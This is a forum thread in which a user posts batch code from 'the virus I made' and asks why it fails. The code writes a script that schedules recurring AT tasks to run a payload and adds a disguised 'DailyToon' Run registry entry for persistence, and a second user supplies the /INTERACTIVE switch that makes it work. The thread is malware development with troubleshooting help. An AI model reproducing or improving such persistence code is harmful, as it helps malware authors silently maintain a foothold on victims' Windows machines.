monitor file activity
+ Reply to Thread
Results 1 to 3 of 3

Thread: Sceduling Events via batch files

  1. #1
    Join Date
    Jul 2006
    Posts
    6

    Sceduling Events via batch files

    I'm trying to make a batch file set events and runs them, but it's not working. Here's the excerpt of code from the virus I made that deals with sceduling events:
    Code:
    echo @echo off >> "%userprofile%\setvents.bat"
    echo at **:00 /EVERY:M,T,W,Th,F,Sa "%userprofile%\hello.bat" >> "%userprofile%\setvents.bat"
    echo at **:*7 /EVERY:M,T,W,Th,F,Sa "%userprofile%\hello.bat" >> "%userprofile%\setvents.bat"
    echo at *5:00 /EVERY:M,T,W,Th,F,Sa "%userprofile%\hello.bat" >> "%userprofile%\setvents.bat"
    echo at *7:00 /EVERY:M,T,W,Th,F,Sa "%userprofile%\hello.bat" >> "%userprofile%\setvents.bat"
    echo at **:00 /EVERY:M,T,W,Th,F,Sa "%userprofile%\hello.bat" >> "%userprofile%\setvents.bat"
    REM Sceduling Events
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "DailyToon" /d "%userprofile%\setvents.bat" /f
    cls
    This doesn't work, and it's very odd. When I execute the code, sceduled events will appear in Control Panel/Sceduled Tasks, but when the time comes for them to execute, they don't do anything. They just say "Running", while they aren't running anything.

    I was trying to debug this and I changed "%userprofile%\hello.bat" to "sol.exe". No Solitare popped up, but a process in the background named "sol.exe" started to run. I don't get it.

    Thanks for reading, and I hope you can help.

  2. #2
    Join Date
    Jan 2005
    Posts
    623
    Your missing the switch: /INTERACTIVE

    Without it, the program runs in the background. I have also run into some privledge issues using the AT command to create a scheduled task, but try the interactive switch and see if that fixes things.
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
    [url=http://www.syntax******.info/tools/ip.php]Get An Ip Address[/url]
    [url=http://www.syntax******.info/tools/base_converter.php]Base Converter[/url]
    --------------------------------
    [URL=http://www.boninroad.com/syntax******/]Old Site[/URL]
    [URL=http://www.syntax******.info]Comming Soon[/URL]

  3. #3
    Join Date
    Jul 2006
    Posts
    6
    Yeah, /INTERACTIVE solved my problem. Thanks.

+ Reply to Thread

Similar Threads

  1. The back door batch
    By teknicalissue in forum Tutorials
    Replies: 4
    Last Post: 02-05-2008, 10:03 AM
  2. Syntax****** - Batch Script
    By SyntaXmasteR in forum Internet Privacy
    Replies: 18
    Last Post: 06-15-2006, 04:58 AM
  3. Need a port scanner in Batch
    By Raz3r in forum Internet Privacy
    Replies: 3
    Last Post: 12-05-2005, 11:54 AM
  4. Batch file
    By Demonizer in forum Viruses and Trojans
    Replies: 2
    Last Post: 08-19-2005, 11:07 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts